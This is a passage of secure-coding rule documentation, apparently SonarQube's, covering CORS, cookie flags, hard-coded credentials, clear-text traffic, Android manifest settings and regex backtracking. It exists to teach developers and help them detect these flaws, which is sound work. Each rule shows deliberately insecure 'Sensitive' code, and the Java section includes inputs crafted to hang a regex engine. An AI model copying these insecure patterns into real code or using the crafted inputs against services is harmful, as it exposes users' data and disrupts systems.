        options.AddPolicy(name: "EnableAllPolicy", builder =>
        {
            builder.WithOrigins("*"); // Sensitive
        });

        options.AddPolicy(name: "OtherPolicy", builder =>
        {
            builder.AllowAnyOrigin(); // Sensitive
        });
    });

    services.AddControllers();
}

ASP.NET MVC:

public class HomeController : ApiController
{
    public HttpResponseMessage Get()
    {
        var response = HttpContext.Current.Response;

        response.Headers.Add("Access-Control-Allow-Origin", "*"); // Sensitive
        response.Headers.Add(HeaderNames.AccessControlAllowOrigin, "*"); // Sensitive
        response.AppendHeader(HeaderNames.AccessControlAllowOrigin, "*"); // Sensitive
    }
}
[EnableCors(origins: "*", headers: "*", methods: "GET")] // Sensitive
public HttpResponseMessage Get() => new HttpResponseMessage()
{
    Content = new StringContent("content")
};

User-controlled origin:

String origin = Request.Headers["Origin"];
Response.Headers.Add("Access-Control-Allow-Origin", origin); // Sensitive

Compliant Solution

ASP.NET Core MVC:

[HttpGet]
public string Get()
{
    Response.Headers.Add("Access-Control-Allow-Origin", "https://trustedwebsite.com"); // Safe
    Response.Headers.Add(HeaderNames.AccessControlAllowOrigin, "https://trustedwebsite.com"); // Safe
}
public void ConfigureServices(IServiceCollection services)
{
    services.AddCors(options =>
    {
        options.AddDefaultPolicy(builder =>
        {
            builder.WithOrigins("https://trustedwebsite.com", "https://anothertrustedwebsite.com"); // Safe
        });

        options.AddPolicy(name: "EnableAllPolicy", builder =>
        {
            builder.WithOrigins("https://trustedwebsite.com"); // Safe
        });
    });

    services.AddControllers();
}

ASP.NET MVC:

public class HomeController : ApiController
{
    public HttpResponseMessage Get()
    {
        var response = HttpContext.Current.Response;

        response.Headers.Add("Access-Control-Allow-Origin", "https://trustedwebsite.com");
        response.Headers.Add(HeaderNames.AccessControlAllowOrigin, "https://trustedwebsite.com");
        response.AppendHeader(HeaderNames.AccessControlAllowOrigin, "https://trustedwebsite.com");
    }
}
[EnableCors(origins: "https://trustedwebsite.com", headers: "*", methods: "GET")]
public HttpResponseMessage Get() => new HttpResponseMessage()
{
    Content = new StringContent("content")
};

User-controlled origin validated with an allow-list:

String origin = Request.Headers["Origin"];

if (trustedOrigins.Contains(origin))
{
    Response.Headers.Add("Access-Control-Allow-Origin", origin);
}

See

csharpsquid:S2092

When a cookie is protected with the secure attribute set to true, it will not be sent by the browser over an unencrypted HTTP request and thus cannot be observed by an unauthorized person during a man-in-the-middle attack.

Ask Yourself Whether

  • the cookie is, for instance, a session cookie not designed to be sent over non-HTTPS communication.
  • you are not sure whether the website contains mixed content (i.e. whether HTTPS is used everywhere).

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • It is recommended to use HTTPS everywhere, so setting the secure flag to true should be the default behaviour when creating cookies.
  • Set the secure flag to true for session-cookies.

Sensitive Code Example

When the HttpCookie.Secure property is set to false, the cookie will be sent during an unencrypted HTTP request:

HttpCookie myCookie = new HttpCookie("Sensitive cookie");
myCookie.Secure = false; //  Sensitive: a security-sensitive cookie is created with the secure flag set to false

The default value of the Secure flag is false, unless overridden by the application’s configuration file:

HttpCookie myCookie = new HttpCookie("Sensitive cookie");
//  Sensitive: a security-sensitive cookie is created with the secure flag not defined (by default set to false)

Compliant Solution

Set the HttpCookie.Secure property to true:

HttpCookie myCookie = new HttpCookie("Sensitive cookie");
myCookie.Secure = true; // Compliant

Or change the default flag values for the whole application by editing the Web.config configuration file:

<httpCookies httpOnlyCookies="true" requireSSL="true" />
  • the requireSSL attribute corresponds programmatically to the Secure field.
  • the httpOnlyCookies attribute corresponds programmatically to the httpOnly field.

See

xml:S3355

Why is this an issue?

Every filter defined in the web.xml file should be referenced in a <filter-mapping> element; otherwise such filters are never invoked.

Noncompliant code example

  <filter>
     <filter-name>DefinedNotUsed</filter-name>
     <filter-class>com.myco.servlet.ValidationFilter</filter-class>
  </filter>

Compliant solution

  <filter>
     <filter-name>ValidationFilter</filter-name>
     <filter-class>com.myco.servlet.ValidationFilter</filter-class>
  </filter>

  <filter-mapping>
     <filter-name>ValidationFilter</filter-name>
     <url-pattern>/*</url-pattern>
  </filter-mapping>

Resources

xml:S2068

Because it is easy to extract strings from an application source code or binary, credentials should not be hard-coded. This is particularly true for applications that are distributed or that are open-source.

It has led to vulnerabilities in the past.

Credentials should be stored outside of the code in a configuration file, a database, or a management service for secrets.

This rule flags instances of hard-coded credentials used in database and LDAP connections. It looks for hard-coded credentials in connection strings, and for variable names that match any of the patterns from the provided list.

It’s recommended to customize the configuration of this rule with additional credential words such as "oauthToken", "secret", etc.

Ask Yourself Whether

  • Credentials allow access to a sensitive component like a database, a file storage, an API or a service.
  • Credentials are used in production environments.
  • Application re-distribution is required before updating the credentials.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Store the credentials in a configuration file that is not pushed to the code repository.
  • Store the credentials in a database.
  • Use your cloud provider’s service for managing secrets.
  • If a password has been disclosed through the source code: change it.
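The environment-variable option can be sketched in plain Java (the helper and the DB_PASSWORD variable name are assumptions for illustration; any framework-specific configuration API works the same way):

```java
import java.util.Map;

public class SecretConfig {
    // Hypothetical helper: resolve a credential from the process
    // environment instead of a hard-coded literal. Failing fast when
    // the variable is missing avoids silently using an empty password.
    static String readSecret(Map<String, String> env, String name) {
        String value = env.get(name);
        if (value == null || value.isEmpty()) {
            throw new IllegalStateException(name + " is not set");
        }
        return value;
    }
}
```

In production code this would be called as `readSecret(System.getenv(), "DB_PASSWORD")`; taking the environment map as a parameter keeps the helper testable.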

Sensitive Code Example

Spring Social Twitter secrets can be stored inside an XML file:

<?xml version="1.0" encoding="UTF-8"?>
<beans xmlns="http://www.springframework.org/schema/beans"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xsi:schemaLocation="
        http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">

    <bean id="connectionFactoryLocator" class="org.springframework.social.connect.support.ConnectionFactoryRegistry">
      <property name="connectionFactories">
          <list>
              <bean class="org.springframework.social.twitter.connect.TwitterConnectionFactory">
                  <constructor-arg value="username" />
                  <constructor-arg value="very-secret-password" />   <!-- Sensitive -->
              </bean>
          </list>
      </property>
  </bean>
</beans>

Compliant Solution

In Spring Social Twitter, retrieve secrets from environment variables:

@Configuration
public class SocialConfig implements SocialConfigurer {

    @Override
    public void addConnectionFactories(ConnectionFactoryConfigurer cfConfig, Environment env) {
        cfConfig.addConnectionFactory(new TwitterConnectionFactory(
            env.getProperty("twitter.consumerKey"),
            env.getProperty("twitter.consumerSecret")));  // Compliant
    }
}

See

xml:S5332

Clear-text protocols such as ftp, telnet, or http lack encryption of transported data, as well as the capability to build an authenticated connection. This means that an attacker able to sniff traffic from the network can read, modify, or corrupt the transported content. These protocols are not secure, as they expose applications to an extensive range of risks:

  • sensitive data exposure
  • traffic redirected to a malicious endpoint
  • malware-infected software update or installer
  • execution of client-side code
  • corruption of critical information

Even in the context of isolated networks like offline environments or segmented cloud environments, the insider threat exists. Thus, attacks involving communications being sniffed or tampered with can still happen.

For example, attackers could successfully compromise prior security layers by:

  • bypassing isolation mechanisms
  • compromising a component of the network
  • getting the credentials of an internal IAM account (either from a service account or an actual person)

In such cases, encrypting communications would decrease attackers’ chances of successfully leaking data or stealing credentials from other network components. By layering various security practices (segmentation and encryption, for example), the application follows the defense-in-depth principle.

Note that using the http protocol is being deprecated by major web browsers.

It has led to vulnerabilities in the past.

Ask Yourself Whether

  • Application data needs to be protected against falsifications or leaks when transiting over the network.
  • Application data transits over an untrusted network.
  • Compliance rules require the service to encrypt data in transit.
  • Your application renders web pages with a relaxed mixed content policy.
  • OS-level protections against clear-text traffic are deactivated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Make application data transit over a secure, authenticated and encrypted protocol like TLS or SSH. Here are a few alternatives to the most common clear-text protocols:
    • Use ssh as an alternative to telnet.
    • Use sftp, scp, or ftps instead of ftp.
    • Use https instead of http.
    • Use SMTP over SSL/TLS or SMTP with STARTTLS instead of clear-text SMTP.
  • Enable encryption of cloud components communications whenever it is possible.
  • Configure your application to block mixed content when rendering web pages.
  • If available, enforce OS-level deactivation of all clear-text traffic.

It is recommended to secure all transport channels, even on local networks, as it can take a single non-secure connection to compromise an entire application or system.
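As a small guard implementing the "use encrypted alternatives" advice above, a URI's scheme can be checked before any connection is opened. A sketch in plain Java; the exact set of accepted schemes is an assumption to adjust to your environment:

```java
import java.net.URI;
import java.util.Set;

public class SchemeCheck {
    // Schemes treated as encrypted for the purposes of this sketch.
    static final Set<String> ENCRYPTED =
            Set.of("https", "sftp", "ftps", "ssh", "scp");

    // Rejects clear-text schemes such as http, ftp, or telnet.
    static boolean usesEncryptedScheme(URI uri) {
        String scheme = uri.getScheme();
        return scheme != null && ENCRYPTED.contains(scheme.toLowerCase());
    }
}
```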

Sensitive Code Example

<application
    android:usesCleartextTraffic="true"> <!-- Sensitive -->
</application>

For versions older than Android 9 (API level 28), android:usesCleartextTraffic is implicitly set to true.

<application> <!-- Sensitive -->
</application>

Compliant Solution

<application
    android:usesCleartextTraffic="false">
</application>

See

xml:S3330

When a cookie is configured with the HttpOnly attribute set to true, the browser guarantees that no client-side script will be able to read it. In most cases, when a cookie is created, the default value of HttpOnly is false and it’s up to the developer to decide whether or not the content of the cookie can be read by client-side script. As a majority of Cross-Site Scripting (XSS) attacks target the theft of session cookies, the HttpOnly attribute can help to reduce their impact, as it won’t be possible to exploit the XSS vulnerability to steal session cookies.

Ask Yourself Whether

  • the cookie is sensitive, used to authenticate the user (for instance a session cookie).
  • the HttpOnly attribute offers an additional protection (not the case for an XSRF-TOKEN cookie / CSRF token, for example).

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • By default, the HttpOnly flag should be set to true for most cookies, and it is mandatory for session / security-sensitive cookies.
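The same setting can be applied programmatically. As a sketch, using the JDK’s java.net.HttpCookie as a stand-in for whatever cookie API the application actually uses (the cookie name and value are illustrative):

```java
import java.net.HttpCookie;

public class SessionCookieFactory {
    // Builds a session cookie with HttpOnly (this rule) and Secure
    // (rule S2092) both enabled.
    static HttpCookie sessionCookie(String value) {
        HttpCookie cookie = new HttpCookie("JSESSIONID", value);
        cookie.setHttpOnly(true); // not readable from client-side script
        cookie.setSecure(true);   // only sent over HTTPS
        return cookie;
    }
}
```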

Sensitive Code Example

<session-config>
 <cookie-config>
  <http-only>false</http-only> <!-- Sensitive -->
 </cookie-config>
</session-config>

<session-config>
 <cookie-config> <!-- Sensitive: http-only tag is missing defaulting to false -->
 </cookie-config>
</session-config>

Compliant Solution

<session-config>
 <cookie-config>
  <http-only>true</http-only> <!-- Compliant -->
 </cookie-config>
</session-config>

See

xml:S3374

Why is this an issue?

According to the Common Weakness Enumeration,

If two validation forms have the same name, the Struts Validator arbitrarily chooses one of the forms to use for input validation and discards the other. This decision might not correspond to the programmer’s expectations…

In such a case, it is likely that the two forms should be combined. At the very least, one should be removed.

Noncompliant code example

<form-validation>
  <formset>
    <form name="BookForm"> ... </form>
    <form name="BookForm"> ... </form>  <!-- Noncompliant -->
  </formset>
</form-validation>

Compliant solution

<form-validation>
  <formset>
    <form name="BookForm"> ... </form>
  </formset>
</form-validation>

Resources

xml:S2647

Why is this an issue?

Basic authentication’s only means of obfuscation is Base64 encoding. Since Base64 encoding is easily recognized and reversed, it offers only the thinnest veil of protection to your users, and should not be used.
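To see how thin that veil is: decoding the Authorization header takes a single standard-library call. A short demonstration (the credentials shown are made up):

```java
import java.nio.charset.StandardCharsets;
import java.util.Base64;

public class BasicAuthDemo {
    public static void main(String[] args) {
        // What BASIC auth transmits, e.g. in
        // "Authorization: Basic dXNlcjpwYXNzd29yZA==":
        String header = Base64.getEncoder()
                .encodeToString("user:password".getBytes(StandardCharsets.UTF_8));

        // Anyone observing the request recovers the credentials directly:
        String decoded = new String(Base64.getDecoder().decode(header),
                StandardCharsets.UTF_8);
        System.out.println(decoded); // prints "user:password"
    }
}
```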

Noncompliant code example

// in web.xml
<web-app  ...>
  <!--  ...  -->
  <login-config>
    <auth-method>BASIC</auth-method>
  </login-config>
</web-app>

Exceptions

The rule will not raise any issue if HTTPS is enabled on any URL pattern.

<web-app  ...>
  <!--  ...  -->
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>HTTPS enabled</web-resource-name>
      <url-pattern>/*</url-pattern>
    </web-resource-collection>
    <user-data-constraint>
      <transport-guarantee>CONFIDENTIAL</transport-guarantee>
    </user-data-constraint>
  </security-constraint>
</web-app>

Resources

xml:S4507

Development tools and frameworks usually have options to make debugging easier for developers. Although these features are useful during development, they should never be enabled for applications deployed in production.

Activating a development feature in production can have a wide range of consequences depending on its use:

  • Technical information leak; generally by disclosing verbose logging information to the application’s user.
  • Arbitrary code execution; generally with a parameter that will allow the remote debugging or profiling of the application.

In all cases, the attack surface of an affected application is increased. In some cases, such features can also make the exploitation of other unrelated vulnerabilities easier.

Ask Yourself Whether

  • The development of the app is completed and the development feature is activated.
  • The app is distributed to end users with the development feature activated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Applications should be released without any development feature activated. When such features are needed during the development process, they should only apply to a build variant dedicated to development environments. That variant should not be the default build configuration, to prevent any unintended exposure of development features.

Sensitive Code Example

In AndroidManifest.xml, the android:debuggable property is set to true. The application will therefore be debuggable.

<application
  android:icon="@mipmap/ic_launcher"
  android:label="@string/app_name"
  android:roundIcon="@mipmap/ic_launcher_round"
  android:supportsRtl="true"
  android:debuggable="true"
  android:theme="@style/AppTheme">
</application>  <!-- Sensitive -->

In a web.config file, the customErrors element’s mode attribute is set to Off. The application will disclose unnecessarily verbose information to its users upon error.

<configuration>
  <system.web>
    <customErrors mode="Off" /> <!-- Sensitive -->
  </system.web>
</configuration>

Compliant Solution

In AndroidManifest.xml, the android:debuggable property is set to false:

<application
  android:icon="@mipmap/ic_launcher"
  android:label="@string/app_name"
  android:roundIcon="@mipmap/ic_launcher_round"
  android:supportsRtl="true"
  android:debuggable="false"
  android:theme="@style/AppTheme">
</application> <!-- Compliant -->

In a web.config file, the customErrors element’s mode attribute is set to On:

<configuration>
  <system.web>
    <customErrors mode="On" /> <!-- Compliant -->
  </system.web>
</configuration>

See

xml:S5594

Why is this an issue?

Once an Android component has been exported, it can be used by attackers to launch malicious actions and might also give access to other components that are not exported.

As a result, sensitive user data can be stolen, and components can be launched unexpectedly.

For this reason, the following components should be protected:

  • Providers
  • Activities
  • Activity-aliases
  • Services

To do so, it is recommended to set exported to false, to add android:readPermission and android:writePermission attributes, or to add a <permission> tag.

Warning: When targeting Android versions lower than 12, the presence of intent filters will cause exported to be set to true by default.

If a component must be exported, use a <permission> tag and the protection level that matches your use case and data confidentiality requirements.
For example, Sync adapters should use a signature protection level to remain both exported and protected.

Noncompliant code example

The following components are vulnerable because permissions are undefined or partially defined:

<provider
  android:authorities="com.example.app.Provider"
  android:name="com.example.app.Provider"
  android:exported="true"
  android:readPermission="com.example.app.READ_PERMISSION" />  <!-- Noncompliant: write permission is not defined -->
<provider
  android:authorities="com.example.app.Provider"
  android:name="com.example.app.Provider"
  android:exported="true"
  android:writePermission="com.example.app.WRITE_PERMISSION" />  <!-- Noncompliant: read permission is not defined -->
<activity android:name="com.example.activity.Activity">  <!-- Noncompliant: permissions are not defined -->
  <intent-filter>
    <action android:name="com.example.OPEN_UI"/>
    <category android:name="android.intent.category.DEFAULT"/>
  </intent-filter>
</activity>

Compliant solution

If the component’s capabilities or data are not intended to be shared with other apps, its exported attribute should be set to false:

<provider
  android:authorities="com.example.app.Provider"
  android:name="com.example.app.Provider"
  android:exported="false" />

Otherwise, implement permissions:

<provider
  android:authorities="com.example.app.Provider"
  android:name="com.example.app.Provider"
  android:exported="true"
  android:readPermission="com.example.app.READ_PERMISSION"
  android:writePermission="com.example.app.WRITE_PERMISSION" />

<activity android:name="com.example.activity.Activity"
          android:permission="com.example.app.PERMISSION" >
  <intent-filter>
    <action android:name="com.example.OPEN_UI"/>
    <category android:name="android.intent.category.DEFAULT" />
  </intent-filter>
</activity>

Resources

xml:S6361

android:permission is used to set a single permission for both reading and writing data from a content provider. With regard to the principle of least privilege, client applications that consume the content provider should have only the privileges necessary to complete their tasks. As android:permission grants read and write access together, it prevents client applications from applying this principle. In practice, client applications that require read-only access will have to ask for more privileges than they need: the content provider will always grant read and write together.

Ask Yourself Whether

  • Some client applications consuming the content provider may only require read permission.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

  • Avoid using the android:permission attribute alone. Instead, use the android:readPermission and android:writePermission attributes to define separate read and write permissions.
  • Avoid using the same permission for android:readPermission and android:writePermission attributes.

Sensitive Code Example

<provider
  android:authorities="com.example.app.Provider"
  android:name="com.example.app.Provider"
  android:permission="com.example.app.PERMISSION"  <!-- Sensitive -->
  android:exported="true"/>
<provider
  android:authorities="com.example.app.Provider"
  android:name="com.example.app.Provider"
  android:readPermission="com.example.app.PERMISSION"  <!-- Sensitive -->
  android:writePermission="com.example.app.PERMISSION" <!-- Sensitive -->
  android:exported="true"/>

Compliant Solution

<provider
  android:authorities="com.example.app.MyProvider"
  android:name="com.example.app.MyProvider"
  android:readPermission="com.example.app.READ_PERMISSION"
  android:writePermission="com.example.app.WRITE_PERMISSION"
  android:exported="true"/>

See

xml:S6359

Why is this an issue?

Defining a custom permission in the android.permission namespace may result in an unexpected permission assignment if a newer version of Android adds a permission with the same name. It is recommended to use a namespace specific to the application for custom permissions.

Noncompliant code example

<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.organization.app">

    <permission
        android:name="android.permission.MYPERMISSION" /> <!-- Noncompliant -->

</manifest>

Compliant solution

<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.organization.app">

    <permission
        android:name="com.organization.app.permission.MYPERMISSION" />

</manifest>

Resources

xml:S5322

Android applications can receive broadcasts from the system or other applications. Receiving intents is security-sensitive; it has led to vulnerabilities in the past.

Receivers can be declared in the manifest or in the code to make them context-specific. If the receiver is declared in the manifest, Android will start the application (if it is not already running) once a matching broadcast is received. The receiver is an entry point into the application.

Other applications can send potentially malicious broadcasts, so it is important to consider broadcasts as untrusted and to limit the applications that can send broadcasts to the receiver.

Permissions can be specified to restrict broadcasts to authorized applications. Restrictions can be enforced by both the sender and receiver of a broadcast. If permissions are specified when registering a broadcast receiver, then only broadcasters who were granted this permission can send a message to the receiver.

This rule raises an issue when a receiver is registered without specifying any broadcast permission.

Ask Yourself Whether

  • The data extracted from intents is not sanitized.
  • Intents broadcast is not restricted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Restrict the access to broadcasted intents. See the Android documentation for more information.

Sensitive Code Example

<receiver android:name=".MyBroadcastReceiver" android:exported="true">  <!-- Sensitive -->
    <intent-filter>
        <action android:name="android.intent.action.AIRPLANE_MODE"/>
    </intent-filter>
</receiver>

Compliant Solution

Enforce permissions:

<receiver android:name=".MyBroadcastReceiver"
    android:permission="android.permission.SEND_SMS"
    android:exported="true">
    <intent-filter>
        <action android:name="android.intent.action.AIRPLANE_MODE"/>
    </intent-filter>
</receiver>

Do not export the receiver and only receive system intents:

<receiver android:name=".MyBroadcastReceiver" android:exported="false">
    <intent-filter>
        <action android:name="android.intent.action.AIRPLANE_MODE"/>
    </intent-filter>
</receiver>

See

xml:S6358

Android has a built-in backup mechanism that can save and restore application data. When application backup is enabled, local data from your application can be exported to Google Cloud or to an external device via adb backup. Enabling Android backup exposes your application to disclosure of sensitive data. It can also lead to corruption of local data when restoration is performed from an untrusted source.

By default, application backup is enabled and includes most of the files in the application’s private storage.

Ask Yourself Whether

  • Application backup is enabled and sensitive data is stored in local files, local databases, or shared preferences.
  • Your application never validates data from files that are included in backups.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Disable application backup unless it is required for your application to work properly.
  • Narrow the scope of backed-up files by using one of the following:
    • backup rules (see android:fullBackupContent attribute).
    • a custom BackupAgent.
    • the dedicated no_backup folder (see android.content.Context#getNoBackupFilesDir()).
  • Do not back up local data containing sensitive information unless they are properly encrypted.
  • Make sure that the keys used to encrypt backup data are not included in the backup.
  • Validate data from backed-up files. They should be considered untrusted as they could have been restored from an untrusted source.

Sensitive Code Example

<application
    android:allowBackup="true"> <!-- Sensitive -->
</application>

Compliant Solution

Disable application backup.

<application
    android:allowBackup="false">
</application>

If targeting Android 6.0 or above (API level 23), define files to include/exclude from the application backup.

<application
    android:allowBackup="true"
    android:fullBackupContent="@xml/backup.xml">
</application>

See

xml:S5604

Permissions that can have a large impact on user privacy, marked as dangerous or "not for use by third-party applications" by Android, should be requested only if they are really necessary to implement critical features of an application.

Ask Yourself Whether

  • You are not sure that the dangerous permissions requested by the application are really necessary.
  • The users are not clearly informed why and when dangerous permissions are requested by the application.

You are at risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It is recommended to carefully review all the permissions and to use dangerous ones only if they are really necessary.

Sensitive Code Example

In AndroidManifest.xml:

<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" /> <!-- Sensitive -->
<uses-permission android:name="android.permission.ACCESS_MEDIA_LOCATION" /> <!-- Sensitive -->

Compliant Solution

<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" /> <!-- Compliant -->

See

xml:S5122

Having a permissive Cross-Origin Resource Sharing policy is security-sensitive. It has led to vulnerabilities in the past.

The same-origin policy in browsers prevents, by default and for security reasons, a JavaScript frontend from performing a cross-origin HTTP request to a resource that has a different origin (domain, protocol, or port) from its own. The requested target can append additional HTTP headers to the response, called CORS headers, that act as directives for the browser and change the access control policy / relax the same-origin policy.

Ask Yourself Whether

  • You don’t trust the origin specified, example: Access-Control-Allow-Origin: untrustedwebsite.com.
  • Access control policy is entirely disabled: Access-Control-Allow-Origin: *
  • Your access control policy is dynamically defined by a user-controlled input like the Origin header.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • The Access-Control-Allow-Origin header should be set only for a trusted origin and for specific resources.
  • Allow only selected, trusted domains in the Access-Control-Allow-Origin header. Prefer whitelisting domains over blacklisting or allowing any domain (do not use * wildcard nor blindly return the Origin header content without any checks).

Sensitive Code Example

<!-- Tomcat 7+ Cors Filter -->
<filter>
  <filter-name>CorsFilter</filter-name>
  <filter-class>org.apache.catalina.filters.CorsFilter</filter-class>
  <init-param>
    <param-name>cors.allowed.origins</param-name>
    <param-value>*</param-value> <!-- Sensitive -->
  </init-param>
</filter>

Compliant Solution

<!-- Tomcat 7+ Cors Filter -->
<filter>
  <filter-name>CorsFilter</filter-name>
  <filter-class>org.apache.catalina.filters.CorsFilter</filter-class>
  <init-param>
    <param-name>cors.allowed.origins</param-name>
    <param-value>https://trusted1.org,https://trusted2.org</param-value> <!-- Compliant -->
  </init-param>
</filter>

See

xml:S3281

Why is this an issue?

Default interceptors, such as application security interceptors, must be listed in the ejb-jar.xml file, or they will not be treated as default.

This rule applies to projects that contain JEE Beans (any one of javax.ejb.Singleton, MessageDriven, Stateless or Stateful).

Noncompliant code example

// file: ejb-interceptors.xml
<assembly-descriptor>
 <interceptor-binding> <!-- should be declared in ejb-jar.xml -->
      <ejb-name>*</ejb-name>
      <interceptor-class>com.myco.ImportantInterceptor</interceptor-class> <!-- Noncompliant; will NOT be treated as default -->
   </interceptor-binding>
</assembly-descriptor>

Compliant solution

// file: ejb-jar.xml
<assembly-descriptor>
 <interceptor-binding>
      <ejb-name>*</ejb-name>
      <interceptor-class>com.myco.ImportantInterceptor</interceptor-class>
   </interceptor-binding>
</assembly-descriptor>

Resources

java:S5852

Most regular expression engines use backtracking to try all possible execution paths of the regular expression when evaluating an input; in some cases this can cause performance issues, known as catastrophic backtracking. In the worst case, the complexity of the regular expression is exponential in the size of the input, meaning that a small, carefully crafted input (around 20 characters) can trigger catastrophic backtracking and cause a denial of service of the application. Super-linear regex complexity can lead to the same impact with, in this case, a large carefully crafted input (thousands of characters).

This rule determines the runtime complexity of a regular expression and informs you of the complexity if it is not linear.

Note that, due to improvements to the matching algorithm, some cases of exponential runtime complexity have become impossible when run using JDK 9 or later. In such cases, an issue will only be reported if the project’s target Java version is 8 or earlier.

Ask Yourself Whether

  • The input is user-controlled.
  • The input size is not restricted to a small number of characters.
  • There is no timeout in place to limit the regex evaluation time.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

To avoid catastrophic backtracking situations, make sure that none of the following conditions apply to your regular expression.

In all of the following cases, catastrophic backtracking can only happen if the problematic part of the regex is followed by a pattern that can fail, causing the backtracking to actually happen. Note that when performing a full match (e.g. using String.matches), the end of the regex counts as a pattern that can fail because it will only succeed when the end of the string is reached.

  • If you have a non-possessive repetition r* or r*?, such that the regex r could produce different possible matches (of possibly different lengths) on the same input, the worst case matching time can be exponential. This can be the case if r contains optional parts, alternations or additional repetitions (but not if the repetition is written in such a way that there’s only one way to match it).
    • When using JDK 9 or later an optimization applies when the repetition is greedy and the entire regex does not contain any back references. In that case the runtime will only be polynomial (in case of nested repetitions) or even linear (in case of alternations or optional parts).
  • If you have multiple non-possessive repetitions that can match the same contents and are consecutive or are only separated by an optional separator or a separator that can be matched by both of the repetitions, the worst case matching time can be polynomial (O(n^c) where c is the number of problematic repetitions). For example, a*b* is not a problem because a* and b* match different things, and a*_a* is not a problem because the repetitions are separated by a '_' and can't match that '_'. However, a*a* and .*_.* have quadratic runtime.
  • If you’re performing a partial match (such as by using Matcher.find, String.split, String.replaceAll etc.) and the regex is not anchored to the beginning of the string, quadratic runtime is especially hard to avoid because whenever a match fails, the regex engine will try again starting at the next index. This means that any unbounded repetition (even a possessive one), if it’s followed by a pattern that can fail, can cause quadratic runtime on some inputs. For example str.split("\\s*,") will run in quadratic time on strings that consist entirely of spaces (or at least contain large sequences of spaces, not followed by a comma).

In order to rewrite your regular expression without these patterns, consider the following strategies:

  • If applicable, define a maximum number of expected repetitions using bounded quantifiers, for instance {1,5} instead of +.
  • Refactor nested quantifiers to limit the number of ways the inner group can be matched by the outer quantifier. For instance, the nested quantifier in (ba+)+ does not cause performance issues, because the inner group can be matched only if there is exactly one b per repetition of the group.
  • Optimize regular expressions with possessive quantifiers and atomic grouping.
  • Use negated character classes instead of . to exclude separators where applicable. For example the quadratic regex .*_.* can be made linear by changing it to [^_]*_.*
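The negated-character-class rewrite from the last bullet can be checked directly. A minimal sketch (the class name `RegexRewrite` is ours) showing that `[^_]*_.*` accepts exactly the same strings as the quadratic `.*_.*`:

```java
import java.util.regex.Pattern;

public class RegexRewrite {
    // ".*_.*" has quadratic worst-case runtime; "[^_]*_.*" is linear because
    // the first repetition can never consume the '_' separator, so there is
    // only one way to match it.
    static final Pattern QUADRATIC = Pattern.compile(".*_.*");
    static final Pattern LINEAR = Pattern.compile("[^_]*_.*");

    static boolean sameAnswer(String input) {
        return QUADRATIC.matcher(input).matches() == LINEAR.matcher(input).matches();
    }

    public static void main(String[] args) {
        // Both patterns accept exactly the strings containing at least one '_'.
        System.out.println(sameAnswer("left_right"));   // true (both accept)
        System.out.println(sameAnswer("no separator")); // true (both reject)
    }
}
```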

Sometimes it's not possible to rewrite the regex to be linear while still matching what you want it to match, especially when performing partial matches, for which quadratic runtimes are quite hard to avoid. In those cases consider the following approaches:

  • Solve the problem without regular expressions
  • Use an alternative non-backtracking regex implementation, such as Google's RE2 or RE2/J.
  • Use multiple passes. This could mean pre- and/or post-processing the string manually before/after applying the regular expression to it or using multiple regular expressions. One example of this would be to replace str.split("\\s*,\\s*") with str.split(",") and then trimming the spaces from the strings as a second step.
  • When using Matcher.find(), it is often possible to make the regex infallible by making all the parts that could fail optional, which will prevent backtracking. Of course this means that you’ll accept more strings than intended, but this can be handled by using capturing groups to check whether the optional parts were matched or not and then ignoring the match if they weren’t. For example the regex x*y could be replaced with x*(y)? and then the call to matcher.find() could be replaced with matcher.find() && matcher.group(1) != null.
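The multiple-pass strategy above can be sketched as follows (the class name `TwoPassSplit` is ours): a linear-time split on the bare comma, followed by a trimming pass, replacing the potentially quadratic `str.split("\\s*,\\s*")`:

```java
import java.util.Arrays;

public class TwoPassSplit {
    // str.split("\\s*,\\s*") can run in quadratic time on space-heavy inputs.
    // Splitting on ',' alone is linear; trimming is done as a second pass.
    static String[] splitAndTrim(String input) {
        String[] parts = input.split(",");
        for (int i = 0; i < parts.length; i++) {
            parts[i] = parts[i].trim();
        }
        return parts;
    }

    public static void main(String[] args) {
        System.out.println(Arrays.toString(splitAndTrim(" a , b ,c ")));
        // [a, b, c]
    }
}
```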

Sensitive Code Example

The first regex evaluation will never end in JDK <= 9, and the second regex evaluation will never end in any version of the JDK:

java.util.regex.Pattern.compile("(a+)+").matcher(
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"+
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"+
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"+
"aaaaaaaaaaaaaaa!").matches(); // Sensitive

java.util.regex.Pattern.compile("(h|h|ih(((i|a|c|c|a|i|i|j|b|a|i|b|a|a|j))+h)ahbfhba|c|i)*").matcher(
"hchcchicihcchciiicichhcichcihcchiihichiciiiihhcchi"+
"cchhcihchcihiihciichhccciccichcichiihcchcihhicchcciicchcccihiiihhihihihi"+
"chicihhcciccchihhhcchichchciihiicihciihcccciciccicciiiiiiiiicihhhiiiihchccch"+
"chhhhiiihchihcccchhhiiiiiiiicicichicihcciciihichhhhchihciiihhiccccccciciihh"+
"ichiccchhicchicihihccichicciihcichccihhiciccccccccichhhhihihhcchchihih"+
"iihhihihihicichihiiiihhhhihhhchhichiicihhiiiiihchccccchichci").matches(); // Sensitive

Compliant Solution

